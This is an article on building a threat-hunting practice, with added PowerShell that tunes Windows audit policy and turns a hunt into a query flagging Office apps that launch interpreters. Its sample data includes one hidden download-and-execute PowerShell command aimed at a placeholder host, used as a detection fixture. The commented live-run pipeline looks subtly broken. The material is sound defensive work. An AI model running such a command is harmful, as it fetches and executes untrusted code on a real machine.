Threat hunting is the acknowledgement that no system can be considered 100% secure. Matt Gangwer, Senior Director, Managed Threat Response, Sophos, and Greg Iddon, Senior Product Marketing Manager, Managed Threat Response, Sophos, offer their advice on how to approach threat hunting for your business.
Whether it is written down or not, every business has the goal of protecting data or information – the lifeblood of modern business – to reduce risk and facilitate the establishment of trust. Trust is the foundation of success for organisations in both the physical and the digital world. A transacting customer affords trust to a business after risk, or at least perceived risk, is reduced to an acceptable level.
Failure to reduce risk forces customers to look elsewhere. A 2018 study from the National Cyber Security Alliance revealed that 25% of SMBs filed for bankruptcy after a data breach, and 10% went out of business entirely. The importance of effective cybersecurity and its ability to reduce risk and maintain customer trust couldn’t be clearer. Effective cybersecurity is not just about implementing security software and policies, it’s about being able to spot and respond to subtle anomalies and behaviours that could indicate an intruder in the network. This is ‘threat hunting’.
Threat hunting is an emergent, human-led endeavour, using an iterative and methodical process to proactively identify threats within a network that have evaded security controls. To threat hunt is to acknowledge that no system can be considered 100% secure, that technology is imperfect and that capable and determined adversaries will find a way to evade multiple layers of protection. The most determined adversaries will test their tactics and techniques against security tooling to ensure they evade detection.
Prevention technologies that proactively protect against threats markedly reduce risk. However, the residual risk, the threats that evade prevention, is often the most damaging. It is exactly these threats that we must hunt for, analyse and respond to. If we don't, we risk incidents escalating into fully fledged data breaches and ultimately put the future of our organisations in jeopardy.
While many organisations have already invested in prevention capabilities, many have yet to put major investment into effective detection of latent or missed threats and the ability to respond to them. Threat hunting is an activity that the modern threat landscape necessitates and which must be performed either by an organisation for itself, or outsourced to a capable third-party to perform as a service to the organisation.
For those that are considering threat hunting for themselves, we would like to share a few things that are worth considering before you start:
Data intelligence / data quality
For threat hunting to be successful, one of the first things any team or organisation should do is take an inventory of its data sources and establish which of them are actually usable for hunting. This simple exercise drives the types of hunt that can be performed. For instance, if you don't have high-fidelity network telemetry, network-based hunts may need to be excluded from scope until you do. Knowing what sources are available gives the team several advantages from the outset:
- Time won’t be wasted performing a hunt over a data set that doesn’t exist — An analyst’s time is extremely valuable, so optimising time when hunt activities are performed will lead to a more efficient and successful team.
- You can begin measuring the value of each data source — Every new hunt should bring learnings to the team and organisation. This doesn’t mean finding a new APT group each and every time, but you can begin measuring the quality of each data set to determine which sources are, and which are not, leading to improvements.
- Advocate for getting new data embedded into the process — As the organisational threat model changes, gaps in coverage can quickly be identified. This will allow for a case to be made to collect and leverage new data sources to accomplish the hunting goals.
Organisations new to threat hunting often cast the net too wide when identifying data sources. This is especially the case for those that take a SIEM-first approach to data collection and aggregation. It is not the volume of data that matters, but one’s ability to identify threats within that data. It is far better to take a threat-centric approach to data collection, whereby a type of threat or vector is considered first and the data that aids detection of that threat is then identified for collection. Frameworks like MITRE’s ATT&CK are invaluable tools for mapping threat hunting capabilities to adversary techniques and revealing blind spots.
Another common failure during data collection is not making full use of a data source. Microsoft Windows event logs, for example, are an incredibly powerful source of data for threat hunters, but the default security audit policy leaves many of the most useful events either switched off or logged without enough detail to help a hunter. Process creation auditing is a case in point: it must be enabled explicitly and, even then, the event records the command line only if a separate policy setting is also turned on. Tuning these settings is a manual reconfiguration step. Care and consideration must be given to each data source to avoid simple but common pitfalls such as this.
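As an added illustration of the audit-policy point above (this is example code written for this page, not the authors' own tooling), the following PowerShell inspects the effective Windows audit policy for a few subcategories hunters typically rely on, enables process creation auditing, switches on command-line capture for event ID 4688, and then checks that the next such event actually carries the extra detail. The list of subcategories is a choice made for this example; the policy key and value name are the documented ones for the "Include command line in process creation events" setting.

```powershell
# Added example (not from the original article): inspect and tighten the
# Windows security audit policy for subcategories threat hunters rely on.
# Run from an elevated PowerShell session on the host being tuned. In a
# domain, set the same values through Group Policy (Advanced Audit Policy
# Configuration), otherwise the next policy refresh may overwrite them.

# 1. Show what the current effective policy records. A setting of
#    "No Auditing" means the corresponding events never fire at all.
#    The subcategory list is this example's selection, not a standard.
$subcategories = @(
    'Process Creation',
    'Process Termination',
    'Logon',
    'Special Logon',
    'Security Group Management',
    'Other Object Access Events'   # scheduled-task and COM activity
)
foreach ($sub in $subcategories) {
    auditpol.exe /get /subcategory:"$sub" | Select-String -Pattern $sub
}

# 2. Enable success and failure auditing for process creation (event ID 4688).
auditpol.exe /set /subcategory:"Process Creation" /success:enable /failure:enable

# 3. Event 4688 omits the command line unless this policy value is set.
#    Without it a hunter sees "powershell.exe" but not what it was asked to run.
$auditKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit'
New-Item -Path $auditKey -Force | Out-Null
Set-ItemProperty -Path $auditKey -Name 'ProcessCreationIncludeCmdLine_Enabled' -Value 1 -Type DWord

# 4. Verify: after a new process starts, the latest 4688 event should carry
#    a non-empty CommandLine field alongside NewProcessName.
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents 1 |
    ForEach-Object {
        $xml = [xml]$_.ToXml()
        $xml.Event.EventData.Data |
            Where-Object { $_.Name -in 'NewProcessName', 'CommandLine' } |
            ForEach-Object { '{0,-16} {1}' -f $_.Name, $_.'#text' }
    }
```

Two caveats worth knowing before rolling this out: command lines can contain secrets (passwords passed as arguments), so the Security log and any forwarding pipeline must be treated as sensitive once this is enabled; and 4688 volume rises sharply on busy servers, so check log size and retention settings at the same time rather than discovering the rollover during an investigation.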
Use of hunting data
By design, hunting exists to identify potential threats that circumvent conventional monitoring controls. This requires formalised procedures and workflow so that, as new hunting hypotheses are generated, they can easily flow through the ‘system’ and receive the necessary testing, analysis and refinement.
The end goal of any hunting team should be to automate and enhance current procedures. More specifically, when a completed hunt turns up malicious or anomalous activity that is worth investigating, the method behind it should be turned into an automated search or query that the monitoring team can run on a schedule. The threshold for promoting a hunt in this way will vary between organisations and teams, but it is an important step: it keeps the hunt team looking forward at new possible threats rather than repeating the ones it has already found.
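To show what such a promotion looks like in practice, here is an added example (written for this page, not part of the authors' text or any Sophos product) of a hunt hypothesis packaged as a reusable PowerShell function the monitoring team can schedule. The hypothesis chosen for illustration is "Office applications should not spawn script interpreters"; the parent and interpreter lists, the helper that flattens a 4688 record, and the sample events are all constructed here and are not taken from the article. It depends directly on the data-quality work above: the ParentProcessName and CommandLine fields only carry useful values once process creation auditing and command-line capture are enabled.

```powershell
# Added example (not from the original article): a hunt hypothesis promoted
# into a repeatable query. Hypothesis (illustrative, chosen for this example):
# Office applications should never spawn a script interpreter.

function ConvertFrom-ProcessCreationEvent {
    # Flatten a Security 4688 record into just the fields the hunt needs.
    # ParentProcessName is present in 4688 on Windows 10 / Server 2016 and later.
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [System.Diagnostics.Eventing.Reader.EventLogRecord] $Record
    )
    process {
        $data = @{}
        foreach ($d in ([xml]$Record.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        [pscustomobject]@{
            TimeCreated       = $Record.TimeCreated
            Computer          = $Record.MachineName
            ParentProcessName = $data['ParentProcessName']
            NewProcessName    = $data['NewProcessName']
            CommandLine       = $data['CommandLine']
        }
    }
}

function Find-OfficeSpawnedInterpreter {
    # Returns one hit per event where an Office parent launched an interpreter.
    # The two lists are parameters so the monitoring team can tune coverage
    # without touching the matching logic.
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        [string[]] $OfficeParents = @('winword.exe', 'excel.exe', 'powerpnt.exe', 'outlook.exe'),
        [string[]] $Interpreters  = @('cmd.exe', 'powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe')
    )
    foreach ($e in $Events) {
        # Compare on the file name only, case-insensitively, so install paths
        # and mixed-case logging do not cause misses.
        $parent = [System.IO.Path]::GetFileName([string]$e.ParentProcessName).ToLowerInvariant()
        $child  = [System.IO.Path]::GetFileName([string]$e.NewProcessName).ToLowerInvariant()
        if ($OfficeParents -contains $parent -and $Interpreters -contains $child) {
            [pscustomobject]@{
                TimeCreated = $e.TimeCreated
                Computer    = $e.Computer
                Parent      = $parent
                Child       = $child
                CommandLine = $e.CommandLine
                Technique   = 'T1059'   # ATT&CK: Command and Scripting Interpreter
            }
        }
    }
}

# Constructed sample records standing in for parsed 4688 events. Only the
# first has an Office parent AND an interpreter child; the other two exercise
# the two halves of the condition on their own.
$sample = @(
    [pscustomobject]@{ TimeCreated = '2024-01-15 09:02:11'; Computer = 'WS01'
        ParentProcessName = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
        NewProcessName    = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine       = 'powershell.exe -nop -w hidden -c "iex (irm http://example.invalid/p)"' }
    [pscustomobject]@{ TimeCreated = '2024-01-15 09:05:40'; Computer = 'WS01'
        ParentProcessName = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
        NewProcessName    = 'C:\Windows\splwow64.exe'
        CommandLine       = 'C:\Windows\splwow64.exe 12288' }   # Office parent, print helper child
    [pscustomobject]@{ TimeCreated = '2024-01-15 09:07:03'; Computer = 'WS02'
        ParentProcessName = 'C:\Windows\explorer.exe'
        NewProcessName    = 'C:\Windows\System32\cmd.exe'
        CommandLine       = 'cmd.exe' }                          # interpreter child, non-Office parent
)

# Offline run over the constructed records.
Find-OfficeSpawnedInterpreter -Events $sample | Format-Table -AutoSize

# Scheduled (live) run: the same function over the last 24 hours of real events.
# Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddHours(-24) } |
#     ConvertFrom-ProcessCreationEvent |
#     ForEach-Object { $_ } | Find-OfficeSpawnedInterpreter -Events @($input)
```

The second and third sample records are included deliberately: the filter keys on the parent/child pair rather than on either name alone, which is what keeps a query like this from flooding the monitoring team with every print job or every user-opened command prompt. Once promoted, the query's hit rate and the true-positive ratio of those hits are exactly the per-source measurements the data-quality section argues for, and the tunable lists give the monitoring team a place to refine the query as the organisation's threat model changes.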